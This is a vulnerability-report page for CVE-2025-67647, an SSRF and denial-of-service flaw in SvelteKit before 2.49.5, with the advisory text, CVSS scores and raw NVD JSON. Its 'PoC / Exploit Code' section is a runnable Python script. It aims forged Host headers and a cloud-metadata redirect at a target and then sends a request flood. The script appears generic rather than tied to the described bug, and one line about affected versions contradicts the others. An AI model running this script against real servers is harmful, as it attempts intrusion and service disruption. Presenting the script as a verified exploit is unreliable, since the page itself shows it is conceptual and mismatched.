Security Vulnerability Report
中文
CVE-2025-67647 CVSS 9.1 CRITICAL

CVE-2025-67647

Published: 2026-01-15 19:16:04
Last Modified: 2026-01-21 20:37:38
Source: [email protected]

Description

SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.49.5, SvelteKit is vulnerable to a server side request forgery (SSRF) and denial of service (DoS) under certain conditions. From 2.44.0 through 2.49.4, the vulnerability results in a DoS when your app has at least one prerendered route (export const prerender = true). From 2.19.0 through 2.49.4, the vulnerability results in a DoS when your app has at least one prerendered route and you are using adapter-node without a configured ORIGIN environment variable, and you are not using a reverse proxy that implements Host header validation. This vulnerability is fixed in 2.49.5.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:svelte:adapter-node:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:svelte:kit:*:*:*:*:*:node.js:*:* - VULNERABLE
SvelteKit >= 2.44.0 且 < 2.49.5 (具有预渲染路由的应用)
SvelteKit >= 2.19.0 且 < 2.49.5 (使用adapter-node且未配置ORIGIN环境变量)
SvelteKit < 2.49.5 (全部版本均受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67647 PoC - SvelteKit SSRF/DoS Attack # Target: SvelteKit < 2.49.5 with prerendered routes # Note: This PoC demonstrates the attack concept import requests import sys def exploit_sveltekit_ssrf(target_url): """ SvelteKit SSRF/DoS vulnerability exploitation Requires target to have prerender = true routes """ headers = { 'Host': 'localhost', # Manipulate Host header 'User-Agent': 'Mozilla/5.0', 'Accept': '*/*' } # Path to trigger prerender with malicious parameters exploit_paths = [ '/api/internal/request', '/__data.json', '/prerender-ssr-test' ] print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting CVE-2025-67647 SSRF/DoS vulnerability") for path in exploit_paths: try: # Send malformed request to trigger SSRF/DoS url = f"{target_url}{path}?redirect=http://169.254.169.254/latest/meta-data/" response = requests.get(url, headers=headers, timeout=5) print(f"[+] Sent exploit request to {path}") print(f" Status: {response.status_code}") except requests.exceptions.Timeout: print(f"[!] Request timeout - possible DoS triggered") except Exception as e: print(f"[-] Error: {e}") def trigger_dos(target_url): """ Denial of Service attack via malformed prerender requests """ print(f"[*] Initiating DoS attack on {target_url}") for i in range(100): try: headers = { 'Host': f'malicious-host-{i}.internal', 'X-Forwarded-Host': 'localhost', 'Origin': 'http://evil.com' } requests.get( f"{target_url}/__data.json", headers=headers, timeout=1 ) except: pass print("[*] DoS flood completed") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-67647.py <target_url>") sys.exit(1) target = sys.argv[1] exploit_sveltekit_ssrf(target) trigger_dos(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67647", "sourceIdentifier": "[email protected]", "published": "2026-01-15T19:16:03.870", "lastModified": "2026-01-21T20:37:37.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.49.5, SvelteKit is vulnerable to a server side request forgery (SSRF) and denial of service (DoS) under certain conditions. From 2.44.0 through 2.49.4, the vulnerability results in a DoS when your app has at least one prerendered route (export const prerender = true). From 2.19.0 through 2.49.4, the vulnerability results in a DoS when your app has at least one prerendered route and you are using adapter-node without a configured ORIGIN environment variable, and you are not using a reverse proxy that implements Host header validation. This vulnerability is fixed in 2.49.5."}, {"lang": "es", "value": "SvelteKit es un framework para desarrollar rápidamente aplicaciones web robustas y de alto rendimiento usando Svelte. Antes de la 2.49.5, SvelteKit es vulnerable a una falsificación de petición del lado del servidor (SSRF) y denegación de servicio (DoS) bajo ciertas condiciones. Desde la 2.44.0 hasta la 2.49.4, la vulnerabilidad resulta en una DoS cuando su aplicación tiene al menos una ruta prerrenderizada (export const prerender = true). Desde la 2.19.0 hasta la 2.49.4, la vulnerabilidad resulta en una DoS cuando su aplicación tiene al menos una ruta prerrenderizada y está usando adapter-node sin una variable de entorno ORIGIN configurada, y no está usando un proxy inverso que implemente la validación del encabezado Host. Esta vulnerabilidad está corregida en la 2.49.5."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:H/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-248"}, {"lang": "en", "value": "CWE-918"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:svelte:adapter-node:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "5.4.1", "versionEndExcluding": "5.5.1", "matchCriteriaId": "E3D434B8-77EC-432C-B1CA-AB441068FDD9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:svelte:kit:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "2.19.0", "versionEndExcluding": "2.49.5", "matchCriteriaId": "C7B8741D-ECC4-4E4D-BB92-208C0E740D40"}]}]}], "references": [{"url": "https://github.com/sveltejs/kit/commit/d9ae9b00b14f5574d109f3fd548f960594346226", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/sveltejs/kit/security/advisories/GHSA-j62c-4x62-9r35", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.